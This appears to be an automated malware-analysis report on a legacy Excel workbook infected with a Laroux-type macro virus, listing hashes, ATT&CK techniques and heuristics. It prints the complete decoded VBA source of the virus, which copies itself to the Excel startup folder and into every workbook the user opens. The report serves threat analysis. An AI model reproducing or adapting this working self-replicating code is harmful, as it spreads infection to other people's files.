Office (OLE) malware analysis — malicious · e4f73b71f6258967

MALICIOUS

Office (OLE)

89.0 KB Created: 2001-07-07 11:02:23 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 6b8b0f7ea02a0bc4b723212845f40f64 SHA-1: 8247dff3f07c10f3717e1f60addc02c1b3b652d3 SHA-256: e4f73b71f62589676755d6d9d3f59c555d7f37642810f60f2e15d33885f3e85f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel 5 macro-virus, identified by the 'LAROUX_MACRO_VIRUS' heuristic. It contains an Auto_Open macro that attempts to copy itself to the Excel startup directory as 'nt².xls' and register itself to run automatically. This indicates a persistence mechanism designed to ensure the macro executes whenever Excel is opened.

Heuristics 3

Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS

Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 992 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	992 bytes
SHA-256: `988293333aca021b00ff357edb9be3afdd8692a68a0b0d11e8f93f0190dc554c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "nt²" Private Sub auto_open() Application.OnSheetActivate = "SearchSelf" End Sub Private Static Sub SearchSelf() On Error Resume Next Const Self As String = "nt².xls" Dim Resident As Boolean, strCurrDir As String Application.ScreenUpdating = False Resident = Dir(Application.StartupPath & "\" & Self) = Self If Resident Then If ActiveWorkbook.Sheets(1).Name <> "nt²" Then Workbooks(Self).Sheets("nt²").Copy before:=ActiveWorkbook.Sheets(1) End If Else Sheets("nt²").Select: Sheets("nt²").Copy strCurrDir = CurDir() ChDir Application.StartupPath Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "\" & Self ChDir strCurrDir ActiveWindow.Visible = False Workbooks(Self).Save End If Application.ScreenUpdating = True Application.OnSheetActivate = "nt².xls!SearchSelf" End Sub

SHA-256: 988293333aca021b00ff357edb9be3afdd8692a68a0b0d11e8f93f0190dc554c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "nt²"









Private Sub auto_open()
    Application.OnSheetActivate = "SearchSelf"
End Sub

Private Static Sub SearchSelf()
On Error Resume Next
Const Self As String = "nt².xls"
Dim Resident As Boolean, strCurrDir As String

    Application.ScreenUpdating = False
    Resident = Dir(Application.StartupPath & "\" & Self) = Self
    If Resident Then
       If ActiveWorkbook.Sheets(1).Name <> "nt²" Then
           Workbooks(Self).Sheets("nt²").Copy before:=ActiveWorkbook.Sheets(1)
       End If
    Else
        Sheets("nt²").Select: Sheets("nt²").Copy
        strCurrDir = CurDir()
        ChDir Application.StartupPath
        Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "\" & Self
        ChDir strCurrDir
        ActiveWindow.Visible = False
        Workbooks(Self).Save
    End If
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "nt².xls!SearchSelf"
    
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.